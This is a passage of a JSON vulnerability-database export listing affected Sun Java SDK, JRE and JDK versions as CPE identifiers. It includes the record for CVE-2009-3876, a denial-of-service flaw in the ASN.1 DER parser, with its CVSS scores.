"cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to cause a denial of service (memory consumption) via crafted DER encoded data, which is not properly decoded by the ASN.1 DER input stream parser, aka Bug Id 6864911.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3876", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3876"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3876", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", 